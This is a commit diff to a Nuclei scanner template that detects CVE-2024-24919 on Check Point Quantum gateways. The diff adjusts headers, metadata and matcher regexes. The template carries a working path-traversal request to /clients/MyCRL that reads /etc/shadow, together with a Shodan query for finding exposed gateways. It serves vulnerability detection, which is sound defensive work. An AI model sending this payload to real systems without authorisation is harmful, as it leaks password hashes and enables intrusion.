modified regex and added more request parameters

http/cves/2024/CVE-2024-24919.yaml

@@ -5,17 +5,17 @@ info:
   author: johnk3r
   severity: high
   description: |
-    CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade.
+    CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade.
   reference:
     - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
     - https://support.checkpoint.com/results/sk/sk182337
   metadata:
-    verified: true
     max-request: 1
     vendor: checkpoint
     product: quantum_security_gateway
-    shodan-query: html:"Check Point SSL Network"
     cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:*
+    shodan-query: html:"Check Point SSL Network"
+    verified: true
   tags: cve,cve2024,checkpoint,lfi
 
 http:
@@ -23,19 +23,21 @@ http:
       - |
         POST /clients/MyCRL HTTP/1.1
         Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.2.7
+        Content-Length: 39
+        Accept-Encoding: gzip
+        Connection: close
 
         aCSHELL/../../../../../../../etc/shadow
-
     matchers-condition: and
     matchers:
       - type: regex
         part: body
         regex:
-          - "root:"
-          - "nobody:"
+          - "root:.*"
+          - "nobody:.*"
         condition: and
 
       - type: status
         status:
           - 200
-# digest: 490a0046304402200cbd9f1fc5ea98e5649de5e1b43d62d38241188c12d1f4cf19709e2b2aab31a50220643a5fbf43545d89dd02819e0e92ee7fb898212836c04be5c18d446b1950705d:922c64590222798bb761d5b6d8e72950